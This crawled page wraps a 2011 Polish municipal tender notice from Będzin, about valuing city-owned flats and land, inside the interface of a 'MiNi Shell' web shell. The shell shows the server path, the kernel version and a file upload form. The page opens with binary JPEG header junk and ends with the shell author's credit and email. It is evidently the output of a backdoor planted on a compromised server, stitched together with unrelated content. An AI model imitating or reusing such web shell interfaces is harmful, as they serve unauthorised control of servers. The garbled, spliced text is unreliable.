JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111021/276887-N-2011.html

<p class="kh_header"><b>Będzin: Wycena nieruchomości lokalowych  mieszkalnych  i użytkowych  własności  Gminy  Będzin  wraz  z  przygotowaniem dokumentacji do ich zbycia , wycena nieruchomości gruntowych zabudowanych budynkami mieszkalnymi będącymi własnością Gminy Będzin, celem ich zbycia.</b><br>
<b>Numer ogłoszenia: 276887 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Będzin reprezentowane przez Prezydenta Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 32 267 91 34, faks 32 267 91 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycena nieruchomości lokalowych  mieszkalnych  i użytkowych  własności  Gminy  Będzin  wraz  z  przygotowaniem dokumentacji do ich zbycia , wycena nieruchomości gruntowych zabudowanych budynkami mieszkalnymi będącymi własnością Gminy Będzin, celem ich zbycia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wycena obejmuje nieruchomości gruntowe zabudowane budynkami mieszkalnymi oraz nieruchomości lokalowe mieszkalne i użytkowe na terenie miasta Będzina w budynkach, dla których Gmina posiada dokumentację inwentaryzacyjną oraz dla budynków bez wykonanej inwentaryzacji.
Zakres opracowania :
1. Wykonanie    operatu   szacunkowego  pojedynczego  lokalu  mieszkalnego lub  użytkowego,
z wykorzystaniem  istniejącej, aktualnej  dokumentacji technicznej lub inwentaryzacji -10 szt.
Operat    powinien    być    opracowany    zgodnie  z  obowiązującymi   standardami    zawodowymi rzeczoznawców   majątkowych   oraz   Rozporządzeniem    Rady   Ministrów  z  dnia   21.09.2004r. w sprawie  szczegółowych  wyceny  nieruchomości i sporządzania  operatu  szacunkowego ( Dz. U. z 2004 r. Nr 207 poz. 2109 ze zm. ), a w szczególności winien zawierać:
a) opis i określenie stanu nieruchomości 
-stan prawny nieruchomości,                                                                                               -położenie nieruchomości,
-przeznaczenie nieruchomości w m.p.z.p.,                                                                                           
-dane o lokalizacji budynku i działki (czynniki środowiskowe i otoczenie ),
-dane o budynku mieszkalnym,
b) opis lokalu mieszkalnego: 
- imię i nazwisko najemcy,
- położenie lokalu, uwagi o stanie technicznym oraz wyposażeniu lokalu w instalacje,
- podanie powierzchni użytkowej wszystkich pomieszczeń w danym lokalu określonej w m2 z dokładnością do drugiego  miejsca po przecinku, a także podanie powierzchni użytkowej dla całego lokalu oraz powierzchni użytkowej pomieszczeń przynależnych z dokładnością j.w.,
c) określenie wartości nieruchomości , a w tym :
-określenie wartości rynkowej nieruchomości lokalowej z zaznaczoną datą sporządzenia operatu 
i terminem ważności wyceny ,
-określenie potencjału nieruchomości oraz ocena alternatywnych sposobów użytkowania, 
d) wpisanie wielkości udziału w częściach wspólnych budynku oraz udziału w gruncie 
( współwłasności lub użytkowania wieczystego ), z dokładnością do pięciu miejsc po przecinku,
e) określenie metody wyceny (szczegółowy opis wybranej metody z uzasadnieniem),
f) przedstawienie krótkiej analizy i charakterystyki rynku nieruchomości,
g)wyliczenie współczynników korygujących mających wpływ na cenę (z uwzględnieniem remontów wykonanych w budynku i lokalu w przeciągu ostatnich 2 lat ), 
h) protokół z przeglądu lokalu podpisany przez najemcę dołączony do każdego egzemplarza:
-Operaty szacunkowe winny być sporządzone w 2 egzemplarzach.
2. Wykonanie  operatu   szacunkowego   pojedynczego   lokalu  mieszkalnego  lub  użytkowego w budynkach, w których  sprzedaż  jest  kontynuowana , bez  uprzedniej inwentaryzacji wraz
z wykonaniem inwentaryzacji pojedynczego lokalu mieszkalnego oraz pomieszczeń przynależnych - 19 szt.
Operat powinien być opracowany zgodnie z obowiązującymi standardami zawodowymi rzeczoznawców majątkowych oraz Rozporządzeniem Rady Ministrów z dnia 21.09.2004 r. 
w sprawie szczegółowych wyceny nieruchomości i sporządzania operatu szacunkowego (Dz.U. 
z 2004 r. Nr 207 poz. 2109 ze  zm.), a w szczególności winien zawierać :
a) opis i określenie stanu nieruchomości:
-stan prawny nieruchomości, 
-położenie nieruchomości,
-przeznaczenie nieruchomości w m.p.z.p.,
-dane o lokalizacji budynku i działki (czynniki środowiskowe i otoczenie ),
-dane o budynku mieszkalnym,
b) opis lokalu mieszkalnego: 
- imię i nazwisko najemcy,
-położenie lokalu, uwagi o stanie technicznym oraz wyposażeniu lokalu w instalacje,
-podanie powierzchni użytkowej wszystkich pomieszczeń w danym lokalu określonej w m2 z dokładnością do drugiego miejsca po przecinku, a także podanie powierzchni użytkowej dla całego lokalu oraz powierzchni użytkowej pomieszczeń przynależnych z dokładnością j.w. 
c) określenie wartości nieruchomości , a w tym :
-określenie wartości rynkowej nieruchomości lokalowej z zaznaczoną datą sporządzenia operatu
 i terminem ważności wyceny ,
-określenie potencjału nieruchomości oraz ocena alternatywnych sposobów użytkowania .
d) ustalenie wielkości udziału w częściach wspólnych budynku oraz udziału w gruncie 
( współwłasności lub użytkowania wieczystego ), 
-wyliczenie wskaźnika w częściach ułamkowych w oparciu o ustawę o własności lokali 
z dokładnością do pięciu miejsc po przecinku ,
e) określenie metody wyceny (szczegółowy opis wybranej metody z uzasadnieniem),
f) przedstawienie krótkiej analizy i charakterystyki rynku nieruchomości,                                         
g) wyliczenie współczynników korygujących mających wpływ na cenę ( z uwzględnieniem remontów wykonanych w budynku i lokalu w przeciągu ostatnich 2 lat ),
h) protokół z przeglądu i obmiaru lokalu podpisany przez najemcę dołączony do każdego egzemplarza .
Operaty szacunkowe winny być sporządzone w 2 egzemplarzach.
Do  operatu   winna   być  dołączona   inwentaryzacja   lokalu  i  pomieszczeń  przynależnych, która powinna obejmować:
-dokumentację  techniczną w postaci  poziomego  rzutu  kondygnacji z naniesionym i zaznaczonym kolorem - lokalem   mieszkalnym  lub  użytkowym   podlegającym   wycenie oraz poziomego rzutu kondygnacji z zaznaczonym  lokalem  przynależnym, a jeśli lokal  przynależny jest  położony  poza budynkiem np. komórki również rzut przynależnego obiektu 
( z wykolorowaniem ),
-w przypadku  budynków  wielosegmentowych  należy  przedstawić lokal na rzucie  odpowiedniego segmentu z zaznaczeniem, szkicowym położenia segmentu w budynku ,
-obmiar  lokali  mieszkalnych  wraz  z  pomieszczeniami  przynależnymi  należy  wykonać  zgodnie z art. 2, ust. 2  ustawy  z  dnia  21.06.2001 r. o  ochronie  praw  lokatorów, mieszkaniowym  zasobie gminy i o zmianie Kodeksu cywilnego ( t.j.Dz. U. z 2005 r.Nr 31, poz. 266 ze zm.).
Rzuty lokali i pomieszczeń przynależnych winny być sporządzone w 3 egzemplarzach. 

Dokumenty  jak w ppkt 2 winny być  przygotowane  zgodnie  z art. 2, ust. 5 i 6 ustawy o własności lokali z dnia 24.06.1994 r. (t.j.Dz. U. z 2000 r. Nr 80. poz. 903 ze zm.). 
3. Wykonanie   operatu    szacunkowego    określającego   wartość   rynkową   nieruchomości gruntowej będącej własnością Gminy Będzin, składającej się z jednej lub kilku działek gruntu związanych z budynkiem , w którym znajdują się lokale będące przedmiotem sprzedaży,celem naliczenia   I-szej  opłaty  z  tytułu  wieczystego  użytkowania  gruntu  oraz  aktualizacji  opłat rocznych dla lokali dotychczas sprzedanych - 3 szt.
Operat    powinien   być    opracowany    zgodnie   z   obowiązującymi   standardami   zawodowymi rzeczoznawców   majątkowych   oraz   Rozporządzeniem   Rady   Ministrów   z  dnia  21.09.2004 r.
w  sprawie  szczegółowych  wyceny  nieruchomości  i  sporządzania  operatu szacunkowego (Dz.U.
z 2004 r. Nr 207 poz. 2109 ze zm.), a w szczególności winien zawierać :

a)opis i określenie stanu nieruchomości:
- stan prawny nieruchomości,
- położenie nieruchomości ,
- dane o lokalizacji działki,

b)określenie przedmiotu i zakresu wyceny,
c)cel wyceny ,
d)podstawy opracowania operatu szacunkowego,
e)przeznaczenie nieruchomości,
f)analiza i charakterystyka rynku nieruchomości,
g)przedstawienie sposobu wyceny,
h)określenie wartości nieruchomości.
Operaty winny być sporządzone w 2 egzemplarzach.
                                                                                                                  Podstawa formalno-prawna opracowania :
-ustawa z dnia 7 lipca 1994 roku Prawo Budowlane (t.j. Dz. U. z 2010 r. Nr 243 poz. 1623 ze zm.).                                                                                                           -Rozporządzenie Ministra Infrastruktury z dnia 12.04.2002r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75 , poz. 690 ze zm.),
-ustawa z dnia 21.06.2001 r. o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego (t.j.Dz. U. z 2005 r. Nr 31, poz. 266  ze zm.) .
-ustawa z dnia 24.06.1994 r. o własności lokali ( t.j. Dz. U. z 2000 r. Nr 80, poz. 903  ze zm.),
-ustawa z dnia 21.08.1997 r. o gospodarce nieruchomościami (t.j. Dz.U. z 2010 r. Nr 102, poz. 651, ze zm.),
-Rozporządzenie Rady Ministrów z dnia 21.09.2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego ( Dz. U. z 2004 r. Nr 207 , poz. 2109 ze zm.),
- Standardy Zawodowe Rzeczoznawców Majątkowych Polska Federacja Stowarzyszeń Rzeczoznawców Majątkowych, Warszawa 2000 rok ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się wykazania usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie.
Wymaga się wykazania 2 usług obejmujących wykonanie łącznie 50 szt. operatów w zakresie wyceny nieruchomości lokalowych.
Jeżeli kwoty w dokumentach określone są w walucie innej niż w złotych polskich, Zamawiający dokona ich przeliczenia na polskie złote według Tabeli kursów średnich walut obcych ogłoszonego przez Narodowy Bank Polski w dniu wszczęcia postępowania. Wykonawcy wspólnie tworzący jeden podmiot mogą złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (wystarczającym będzie, jeżeli dokumenty te złoży tylko jeden z Wykonawców wspólnie składających ofertę, o ile potwierdzać to będzie spełnianie warunków udziału w postępowaniu ). Jeżeli wykonawca, wykazując spełnianie warunków,o których mowa powyżej polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp to w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia). Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach
i oświadczeniach złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się wykazania osób, które będą uczestniczyć w wykonywaniu zamówienia,
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.

Warunek dysponowania zostanie spełniony, jeżeli Wykonawca wykaże:
   - dysponowania min. 1 osobą  posiadającą uprawnienia rzeczoznawcy majątkowego zgodnie
   z ustawą z dnia 21.08.1997 r. o gospodarce nieruchomościami ( t.j. Dz. U.  z 2004 r., nr  261 poz. 2603 ze zm.).
 Wykonawcy wspólnie tworzący jeden podmiot mogą złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (wystarczającym będzie, jeżeli dokumenty te złoży tylko jeden
z Wykonawców wspólnie składających ofertę, o ile potwierdzać to będzie spełnianie warunków udziału w postępowaniu ). Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa powyżej polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp to w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia). Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach
i oświadczeniach złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony czytelnie, podpisany przez Wykonawcę formularz ofertowy na druku
lub według druku stanowiącym załącznik nr 1 do SIWZ. 
UWAGA ! Na formularzu ofertowym należy ujawnić wszystkie podmioty składające ofertę wspólną z zaznaczeniem np. Konsorcjum.
2. Pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zapisu we właściwym rejestrze lub ewidencji, w tym wynikające z art. 23 ust.2ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający    zastrzega    sobie    możliwość    dokonania    zmian   w  umowie  w  przypadkach i na warunkach jak niżej:

1.1 Zmiana terminu realizacji zamówienia może nastąpić w przypadku opóźnień wynikających z:
-przestojów i opóźnień zawinionych przez Zamawiającego,
-działania siły wyższej ( np. klęski żywiołowe, strajki generalne lub lokalne, zjawiska gospodarcze lub pogodowe) w pełni niezależnej od Stron umowy, mającej bezpośredni wpływ na termin wykonania prac,
-przeszkód technicznych w pełni niezależnych od Stron umowy, mających bezpośredni wpływ na termin wykonania prac,
-wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
1.2.Zmiana osób uczestniczących w realizacji zamówienia może nastąpić w przypadku:
-utraty uprawnień,
-długotrwałej choroby lub nieobecności,
-ustanie stosunku prawnego łączącego Wykonawcę z ww. osobami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bedzin.bip.info.pl/index.php?idmp=30&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Będzinie Biuro Zamówień Publicznych pok.117, 42-500 Będzin ul. 11 Listopada 20 tel.fax 32 267 91 34..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 09:00, miejsce: Urząd Miejski w Będzinie Biuro Zamówień Publicznych pok.117, 42-500 Będzin ul. 11 Listopada 20..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com